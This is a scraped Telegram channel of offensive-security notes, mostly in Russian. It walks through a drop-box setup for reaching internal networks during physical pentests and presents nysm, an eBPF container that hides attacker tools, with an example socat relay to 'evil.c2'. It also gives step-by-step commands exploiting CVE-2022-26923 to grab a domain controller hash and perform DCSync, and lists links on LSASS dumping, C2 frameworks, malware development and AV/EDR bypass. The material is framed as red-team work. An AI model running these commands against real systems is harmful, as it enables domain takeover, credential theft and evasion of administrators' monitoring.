offsec notes – Telegram
offsec notes
267 subscribers
16 photos
4 files
92 links
reading list
Download Telegram
Forwarded from Похек (Sergey Zybnev)
NTLM to password
#windows

https://ntlm.pw/

thx snovvcrash


🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
Подготовка устройства для проникновения во внутреннюю сеть при физическом пентесте.

Этапы:
* Деплой внешнего впн сервера
* Настройка самого физ устройства (я использовал orange pi)
* Выбор удобного варианта проксирования во внутреннюю сеть


1) Для реализации 1-го шага можно взять пример из репозитория, который содержит в себе инструкцию по развертыванию open vpn в docker'е.

2) Способы автоматической инициализации подключения к vpn серверу при запуске устройства:

* systemd unit (Пример подходящего юнита можно найти в том же репозитории)

* docker container
docker run -it --cap_add=NET_ADMIN --name vpn --restart always --net host -v (директория с впн конфигом):/vpn -d dperson/openvpn-client


3) Ssh socks proxy
ssh -D 8888 user@remoteserver


Также в самой впн сети можно пробросить маршруты от клиента, до внутренней сети.

Для этого наше устройство нужно настроить для маршрутизации трафика.
sudo sysctl -w net.ipv4.ip_forward=1

sudo iptables -A FORWARD -i <vpn интерфейс> -o <внутренний интерфейс> -j ACCEPT

sudo iptables -A FORWARD -i <внутренний интерфейс> -o <vpn интерфейс> -m state --state ESTABLISHED,RELATED -j ACCEPT

sudo iptables -t nat -A POSTROUTING -o <vpn интерфейс> -j MASQUERADE


Добавить статический маршрут до внутренней сети.
ip route add {NETWORK/MASK} via {GATEWAYIP}


Если мы хотим получить доступ до внутренней сети, будучи таким же vpn клиентом, а не хостом, то статические маршруты нужно добавить на клиент и на хост
🐳1
Forwarded from Похек (Sergey Zybnev)
This media is not supported in your browser
VIEW IN TELEGRAM
🔴 nysm
Скрытый контейнер для постэксплуатации.
#eBPF #offensive

С ростом популярности offensive инструментов, основанных на eBPF, начиная от кражи учетных данных и заканчивая руткитами, скрывающими свой собственный PID, авторам пришел в голову вопрос: Можно ли сделать eBPF невидимым в глазах админа? В результате они создали nysm, eBPF stealth контейнер, предназначенный для того, чтобы сделать инструменты атакующих незаметными для системных администраторов, не только скрывая eBPF, но и многое другое:
- bpftool
- bpflist-bpfcc
- ps
- top
- sockstat
- ss
- rkhunter
- chkrootkit
- lsof
- auditd
- и другое

Как это работает?
Поскольку eBPF не может перезаписывать возвращаемые значения или адреса ядра, наша цель - найти вызов самого низкого уровня, взаимодействующий с адресом пользовательского пространства, чтобы перезаписать его значение и скрыть нужные объекты. Чтобы отличить события nysm от других, все выполняется в отдельном пространстве имен PID.


Установка:
sudo apt install git make pkg-config libelf-dev clang llvm bpftool -y; git clone https://github.com/eeriedusk/nysm; cd nysm; bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h; make


Использование:
Usage: nysm [OPTION...] COMMAND
Stealth eBPF container.

-d, --detach Run COMMAND in background
-r, --rm Self destruct after execution
-v, --verbose Produce verbose output
-h, --help Display this help
--usage Display a short usage message

# Примеры
./nysm bash
./nysm -r ssh user@domain
./nysm -dr socat TCP4-LISTEN:80 TCP4:evil.c2:443


👉 https://github.com/eeriedusk/nysm

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Purple Chronicles (ELK Enjoyer)
Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)🖼️

Кратко поговорим об интересной уязвимости, которая позволяет нам повысить привилегии в домене.
Требования:
1. Доменная учетная запись;
2. Возможность добавлять компьютер в домен;
3. Наличие стандартного шаблона сертификата Machine;
4. Возможность изменять атрибуты учётной записи компьютера (будет по умолчанию после добавления компьютера в домен, так как мы будем владельцем объекта).

🐍 Для эксплуатации используем утилиту Certipy, краткая справка по ней представлена ниже:
# Установка
pip install certipy-ad

# Запрос сертификата
# для certipy-ad v3.0.0:
certipy req 'domain.local/username:password@dc.domain.local' -ca 'CA NAME' -template TemplateName
# для certipy-ad v4.8.2:
certipy req -u username@domain.local -p password -ca 'CA NAME' -template User -upn thm@domain.local -dc-ip 10.10.10.10

# Авторизация с сертификатом для извлечения NTLM-хэша:
certipy auth -pfx username.pfx -dc-ip 10.10.10.10
Начнем атаку с добавления компьютера в домен при помощи Impacket-Addcomputer
addcomputer.py 'domain.local/username:password' -method LDAPS -computer-name 'TESTPC' -computer-pass 'P@ssw0rd'
Запрашиваем сертификат для учётной записи компьютера (шаблон Machine) и авторизуемся с ним:
certipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine

certipy auth -pfx testpc.pfx

Далее заходим на любой хост домена и начинаем менять SPN у записи нашего компьютера:
Get-ADComputer TESTPC -properties dnshostname,serviceprincipalname
Set-ADComputer TESTPC -DnsHostName DC.domain.local # вернёт ошибку из-за дублирующейся SPN
Set-ADComputer TESTPC -ServicePrincipalName @{} # обнуляем SPN
Set-ADComputer TESTPC -DnsHostName DC.domain.local

Возвращаемся на атакующий хост и запрашиваем новый сертификат:
certipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine

Авторизуемся с полченным сертификатом и получаем NTLM хэш учетной записи контроллера домена:
certipy auth -pfx dc.pfx
...
[*] Got NT hash for 'dc$@domain.local': 14fc9b5814def64289bb694f6659c733

Далее осуществляем атаку DCSync любым удобным для нас способом и захватываем домен:
secretsdump.py 'domain.local/dc$@domain.local' -hashes aad3b435b51404eeaad3b435b51404ee:14fc9b5814def64289bb694f6659c733 -outputfile dcsync.txt

Вектор будет работать только в уязвимой к CVE-2022-26923 среде Active Directory, но если вы в ней оказались, то повысить привилегии будет так же просто, как, например, в случае с эксплуатацией ZeroLogon!🔺
#пентест #AD
Please open Telegram to view this post
VIEW IN TELEGRAM
Lsass dump bypassing AV

MirrorDump
nanodump
Physmem2profit
The C2 Matrix

* detailed information about the C2 Matrix

* lab environment used to test the various C2s

* details about each C2 (install and use)

* how to setup attack infrastructure
Forwarded from Proxy Bar
ARTToolkit
*
Интерактивная шпаргалка, содержащая полезный список наступательных инструментов безопасности и соответствующих им команд/полезных данных, которые можно использовать в redteam
*
Link
malware development useful links

BypassAV - Repo with the essential techniques to bypass antivirus and EDR

Bypass AV (practical examples) - useful examples & links

shellcode-fluctuation - article

executing the payload in memory - article

maldev-for-dummies - A workshop about Malware Development


The post will be updated
#maldev
Forwarded from Offensive Xwitter
😈 [ MDSec @MDSecLabs ]

Interested in sharpening your red team AD recon? Check out our latest post by @domchell, "Active Directory Enumeration for Red Teams"

🔗 https://www.mdsec.co.uk/2024/02/active-directory-enumeration-for-red-teams/

🐥 [ tweet ]
ntlm directories scanner - utility for searching directories that accept ntlm in services such as
* OWA servers
* Skype for Business/Lync servers
* Autodiscover servers (autodiscover.domain.com and lyncdiscover.domain.com)
* ADFS servers
🐳1
Для любителей All-in-one
Web-check - open source инструмент для поиска информации о веб-приложении/хосте.

Совершает такие проверки, как
* IP Info
* Server Info
* DNS Records
* Email Configuration
* Open Ports
etc